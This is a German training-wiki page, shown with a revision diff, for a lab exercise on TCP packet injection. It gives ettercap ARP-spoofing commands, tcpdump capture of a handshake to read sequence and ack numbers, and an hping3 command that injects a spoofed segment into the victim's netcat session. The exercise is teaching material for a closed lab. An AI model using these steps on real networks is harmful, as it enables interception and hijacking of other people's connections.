Packet Injection: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(Eine dazwischenliegende Version desselben Benutzers wird nicht angezeigt)
Zeile 1: Zeile 1:
 
=Überlegung=
 
=Überlegung=
*Wir wollen über Arpsoofing eine Verbindung kontrollieren
+
*Wir wollen über Arpspoofing eine Verbindung kontrollieren
 
*Danach wollen wir den 3 Wege Handshake mitschneiden
 
*Danach wollen wir den 3 Wege Handshake mitschneiden
 
*Wir ermitteln daraus die Sequenz, Acknowledge Nummer sowie den Source Port
 
*Wir ermitteln daraus die Sequenz, Acknowledge Nummer sowie den Source Port
Zeile 32: Zeile 32:
 
*DSTPORT=2020
 
*DSTPORT=2020
 
;TCPDUMP
 
;TCPDUMP
*tcpdump -ni eth0 -S host 10.0.10.104 and tcp
+
*tcpdump -ni eth0 -S host $OPFER and tcp
 
;Wir suchen SEQ, ACK und SRCPORT
 
;Wir suchen SEQ, ACK und SRCPORT
  

Aktuelle Version vom 15. Juli 2021, 13:50 Uhr

Überlegung

  • Wir wollen über Arpspoofing eine Verbindung kontrollieren
  • Danach wollen wir den 3 Wege Handshake mitschneiden
  • Wir ermitteln daraus die Sequenz, Acknowledge Nummer sowie den Source Port
  • Mit diesen Daten wollen wir von unserem Angreifer aus, Daten in die Verbindung injizieren.

Vorraussetzung

Versuchsaufbau

  • CLIENT=10.0.10.103
  • OPFER=10.0.10.104
  • ANGREIFER=10.0.10.101
  • DSTPORT=2020

Angreifer

Auf Angreifer brauchen wir 2 Terminals

Terminal 1

Variablen setzen
  • CLIENT=10.0.10.103
  • OPFER=10.0.10.104
  • ANGREIFER=10.0.10.101
  • DSTPORT=2020
Arp Spoofing
  • ettercap -Tq -i eth0 -M arp /$CLIENT,$OPFER// /$OPFER,$CLIENT//

Terminal 2

Variablen setzen
  • CLIENT=10.0.10.103
  • OPFER=10.0.10.104
  • ANGREIFER=10.0.10.101
  • DSTPORT=2020
TCPDUMP
  • tcpdump -ni eth0 -S host $OPFER and tcp
Wir suchen SEQ, ACK und SRCPORT

OPFER

  • nc -lp 2020

CLIENT

  • nc 10.0.10.104 2020

ANGREIFER

TERMINAL 2

  • tcpdump -ni eth0 -S host 10.0.10.104 and tcp
  • tcpdump: verbose output suppressed, use -v[v]... for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes

15:32:57.007020 IP 10.0.10.103.53730 > 10.0.10.104.2020: Flags [S], seq 1196642424, win 64240, options [mss 1460,sackOK,TS val 783051844 ecr 0,nop,wscale 7], length 0

15:32:57.014293 IP 10.0.10.103.53730 > 10.0.10.104.2020: Flags [S], seq 1196642424, win 64240, options [mss 1460,sackOK,TS val 783051844 ecr 0,nop,wscale 7], length 0

15:32:57.014686 IP 10.0.10.104.2020 > 10.0.10.103.53730: Flags [S.], seq 3707523260, ack 1196642425, win 28960, options [mss 1460,sackOK,TS val 1977650 ecr 783051844,nop,wscale 7], length 0

15:32:57.022274 IP 10.0.10.104.2020 > 10.0.10.103.53730: Flags [S.], seq 3707523260, ack 1196642425, win 28960, options [mss 1460,sackOK,TS val 1977650 ecr 783051844,nop,wscale 7], length 0

15:32:57.022652 IP 10.0.10.103.53730 > 10.0.10.104.2020: Flags [.], ack 3707523261, win 502, options [nop,nop,TS val 783051859 ecr 1977650], length 0

15:32:57.030231 IP 10.0.10.103.53730 > 10.0.10.104.2020: Flags [.], ack 3707523261, win 502, options [nop,nop,TS val 783051859 ecr 1977650], length 0

Wir brechen ab mit CTRL-C
Weitere Variablen setzen
  • SEQ=1196642425
  • ACK=3707523261
  • SRCPORT=53730

Payload generieren

  • echo "hallo tux" > data.dat

hping3 injection bauen

Kommando kontrollieren
  • echo hping3 -a $CLIENT -s $SRCPORT -p $DSTPORT -A -d 10 -E data.dat -c 1 -M $SEQ -L $ACK $OPFER
Kommando abschicken
  • hping3 -a $CLIENT -s $SRCPORT -p $DSTPORT -A -d 10 -E data.dat -c 1 -M $SEQ -L $ACK $OPFER

OPFER

  • nc -lp 2020
hallo tux



Links